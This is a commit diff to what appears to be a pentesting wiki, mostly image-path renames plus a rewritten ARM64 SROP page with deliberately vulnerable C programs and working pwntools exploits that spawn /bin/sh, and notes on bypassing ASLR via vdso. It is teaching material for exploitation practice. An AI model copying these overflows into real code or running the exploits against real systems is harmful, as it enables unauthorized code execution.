GITBOOK-4313: No subject

binary-exploitation/basic-binary-exploitation-methodology/tools/README.md

@@ -125,6 +125,9 @@ pattern search $rsp #Search the offset given the content of $rsp
 shellcode search x86 #Search shellcodes
 shellcode get 61 #Download shellcode number 61
 
+#Dump memory to file
+dump binary memory /tmp/dump.bin 0x200000000 0x20000c350
+
 #Another way to get the offset of to the RIP
 1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
 2- ef➤  i f

binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md

@@ -307,6 +307,14 @@ gef➤  x/4i 0xffffffffff600800
    0xffffffffff60080a:    int3
 ```
 
+### vDSO
+
+Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG\_COMPAT\_VDSO as the vdso address won't be randomized. For more info check:
+
+{% content-ref url="../../rop-return-oriented-programing/ret2vdso.md" %}
+[ret2vdso.md](../../rop-return-oriented-programing/ret2vdso.md)
+{% endcontent-ref %}
+
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md

@@ -40,7 +40,7 @@ This gadget basically allows to confirm that something interesting was executed
 
 This technique uses the [**ret2csu**](ret2csu.md) gadget. And this is because if you access this gadget in the middle of some instructions you get gadgets to control **`rsi`** and **`rdi`**:
 
-<figure><img src="../../.gitbook/assets/image.png" alt="" width="278"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1).png" alt="" width="278"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
 
 These would be the gadgets:
 

binary-exploitation/rop-return-oriented-programing/ret2csu.md

@@ -87,7 +87,7 @@ gef➤  search-pattern 0x400560
 
 Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by accessing it specific offsets:
 
-<figure><img src="../../.gitbook/assets/image (1).png" alt="" width="283"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1).png" alt="" width="283"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
 
 Check this page for more info:
 

binary-exploitation/rop-return-oriented-programing/ret2vdso.md

@@ -67,6 +67,18 @@ or_al_byte_ptr_ebx_pop_edi_pop_ebp_ret_addr = vdso_addr + 0xccb
 pop_ebx_pop_esi_pop_ebp_ret = vdso_addr + 0x15cd
 ```
 
+{% hint style="danger" %}
+Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG\_COMPAT\_VDSO as the vdso address won't be randomized: [https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639](https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639)
+{% endhint %}
+
+### ARM64
+
+After dumping and checking the vdso section of a binary in kali 2023.2 arm64, I couldn't find in there any interesting gadget (no way to control registers from values in the stack or to control x30 for a ret) **except a way to call a SROP**. Check more info int eh example from the page:
+
+{% content-ref url="srop-sigreturn-oriented-programming/srop-arm64.md" %}
+[srop-arm64.md](srop-sigreturn-oriented-programming/srop-arm64.md)
+{% endcontent-ref %}
+
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md

@@ -14,26 +14,70 @@ Other ways to support HackTricks:
 
 </details>
 
-## Code
+## Pwntools example
+
+This example is creating the vulnerable binary and exploiting it. The binary **reads into the stack** and then calls **`sigreturn`**:
+
+```python
+from pwn import *
+
+binsh = "/bin/sh"
+context.clear()
+context.arch = "arm64"
+
+asm = ''
+asm += 'sub sp, sp, 0x1000\n'
+asm += shellcraft.read(constants.STDIN_FILENO, 'sp', 1024) #Read into the stack
+asm += shellcraft.sigreturn() # Call sigreturn
+asm += 'syscall: \n' #Easy symbol to use in the exploit
+asm += shellcraft.syscall()
+asm += 'binsh: .asciz "%s"' % binsh #To have the "/bin/sh" string in memory
+binary = ELF.from_assembly(asm)
+
+frame = SigreturnFrame()
+frame.x8 = constants.SYS_execve
+frame.x0 = binary.symbols['binsh']
+frame.x1 = 0x00
+frame.x2 = 0x00
+frame.pc = binary.symbols['syscall']
+
+p = process(binary.path)
+p.send(bytes(frame))
+p.interactive()
+```
+
+## bof example
+
+### Code
 
 ```c
 #include <stdio.h>
 #include <string.h>
+#include <unistd.h>
 
 void do_stuff(int do_arg){
     if (do_arg == 1)
-        __asm__("mov x0, #139; svc #0;");
+        __asm__("mov x8, 0x8b; svc 0;");
     return;
 }
 
+
 char* vulnerable_function() {
     char buffer[64];
-    fgets(buffer, sizeof(buffer)*3, stdin);
+    read(STDIN_FILENO, buffer, 0x1000); // <-- bof vulnerability
+
     return buffer;
 }
 
-int main(int argc, char **argv) {
+char* gen_stack() {
+    char use_stack[0x2000];
+    strcpy(use_stack, "Hello, world!");
     char* b = vulnerable_function();
+    return use_stack;
+}
+
+int main(int argc, char **argv) {
+    char* b = gen_stack();
     do_stuff(2);
     return 0;
 }
@@ -50,9 +94,71 @@ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space  # Disable ASLR
 
 The exploit abuses the bof to return to the call to **`sigreturn`** and prepare the stack to call **`execve`** with a pointer to `/bin/sh`.
 
-{% hint style="danger" %}
-For some reason I don't know the call to **`sigreturn`** is not doing anything so it doesn't work.
-{% endhint %}
+```python
+from pwn import *
+
+p = process('./srop')
+elf = context.binary = ELF('./srop')
+libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
+libc.address = 0x0000fffff7df0000 # ASLR disabled
+binsh = next(libc.search(b"/bin/sh")) 
+
+stack_offset = 72
+
+sigreturn = 0x00000000004006e0 # Call to sig
+svc_call = 0x00000000004006e4  # svc	#0x0
+
+frame = SigreturnFrame()
+frame.x8 = 0xdd            # syscall number for execve
+frame.x0 = binsh
+frame.x1 = 0x00             # NULL
+frame.x2 = 0x00             # NULL
+frame.pc = svc_call
+
+payload = b'A' * stack_offset
+payload += p64(sigreturn)
+payload += bytes(frame)
+
+p.sendline(payload)
+p.interactive()
+```
+
+## bof example without sigreturn
+
+### Code
+
+```c
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+char* vulnerable_function() {
+    char buffer[64];
+    read(STDIN_FILENO, buffer, 0x1000); // <-- bof vulnerability
+
+    return buffer;
+}
+
+char* gen_stack() {
+    char use_stack[0x2000];
+    strcpy(use_stack, "Hello, world!");
+    char* b = vulnerable_function();
+    return use_stack;
+}
+
+int main(int argc, char **argv) {
+    char* b = gen_stack();
+    return 0;
+}
+```
+
+## Exploit
+
+In the section **`vdso`** it's possible to find a call to **`sigreturn`** in the offset **`0x7b0`**:
+
+<figure><img src="../../../.gitbook/assets/image.png" alt="" width="563"><figcaption></figcaption></figure>
+
+Therefore, if leaked, it's possible to **use this address to access a `sigreturn`** if the binary isn't loading it:
 
 ```python
 from pwn import *
@@ -63,32 +169,38 @@ libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
 libc.address = 0x0000fffff7df0000 # ASLR disabled
 binsh = next(libc.search(b"/bin/sh")) 
 
-print("/bin/sh in: " + hex(binsh))
-
 stack_offset = 72
 
-sigreturn = 0x00000000004006a0 # mov	x0, #0x8b ; svc	#0x0
-svc_call = 0x00000000004006a4  # svc	#0x0
-
+sigreturn = 0x00000000004006e0 # Call to sig
+svc_call = 0x00000000004006e4  # svc	#0x0
 
 frame = SigreturnFrame()
 frame.x8 = 0xdd            # syscall number for execve
-frame.x0 = binsh      # pointer to /bin/sh
-frame.x1 = 0x4343434343434343             # NULL
-frame.x2 = 0x0             # NULL
+frame.x0 = binsh
+frame.x1 = 0x00             # NULL
+frame.x2 = 0x00             # NULL
 frame.pc = svc_call
 
 payload = b'A' * stack_offset
 payload += p64(sigreturn)
-payload += b"B" * len(bytes(frame))
-
-with open("/tmp/i", "wb") as f:
-    f.write(payload)
+payload += bytes(frame)
 
 p.sendline(payload)
 p.interactive()
 ```
 
+For more info about vdso check:
+
+{% content-ref url="../ret2vdso.md" %}
+[ret2vdso.md](../ret2vdso.md)
+{% endcontent-ref %}
+
+And to bypass the address of `/bin/sh` you could create several env variables pointing to it, for more info:
+
+{% content-ref url="../../common-binary-protections-and-bypasses/aslr/" %}
+[aslr](../../common-binary-protections-and-bypasses/aslr/)
+{% endcontent-ref %}
+
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

generic-methodologies-and-resources/external-recon-methodology/README.md

@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -730,7 +730,7 @@ There are several tools out there that will perform part of the proposed actions
 
 * All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

generic-methodologies-and-resources/pentesting-methodology.md

@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -150,7 +150,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve
 * [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md)
 * [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md)
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md

@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -133,7 +133,7 @@ However, in this kind of containers these protections will usually exist, but yo
 
 You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE).
 
-<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

network-services-pentesting/pentesting-snmp/README.md

@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -260,7 +260,7 @@ If there is an ACL that only allows some IPs to query the SMNP service, you can
 * snmpd.conf
 * snmp-config.xml
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

network-services-pentesting/pentesting-snmp/cisco-snmp.md

@@ -12,7 +12,7 @@
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -53,7 +53,7 @@ msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
 
 * [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

network-services-pentesting/pentesting-web/README.md

@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -365,7 +365,7 @@ Find more info about web vulns in:
 
 You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities.
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

network-services-pentesting/pentesting-web/jira.md

@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -80,7 +80,7 @@ curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"h
 * [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe)
 * [https://github.com/bcoles/jira\_scan](https://github.com/bcoles/jira\_scan)
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

pentesting-web/file-upload/README.md

@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -340,7 +340,7 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie
 * [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
 * [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

pentesting-web/hacking-jwt-json-web-tokens.md

@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -279,7 +279,7 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are
 
 {% embed url="https://github.com/ticarpi/jwt_tool" %}
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

pentesting-web/ldap-injection.md

@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -235,7 +235,7 @@ intitle:"phpLDAPadmin" inurl:cmd.php
 
 {% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

pentesting-web/sql-injection/postgresql-injection/README.md

@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -106,7 +106,7 @@ SELECT $$hacktricks$$;
 SELECT $TAG$hacktricks$TAG$;
 ```
 
-<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

pentesting-web/xss-cross-site-scripting/README.md

@@ -1,6 +1,6 @@
 # XSS (Cross Site Scripting)
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -1544,7 +1544,7 @@ Find **more SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](ht
 * [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
 * [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
 
-<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).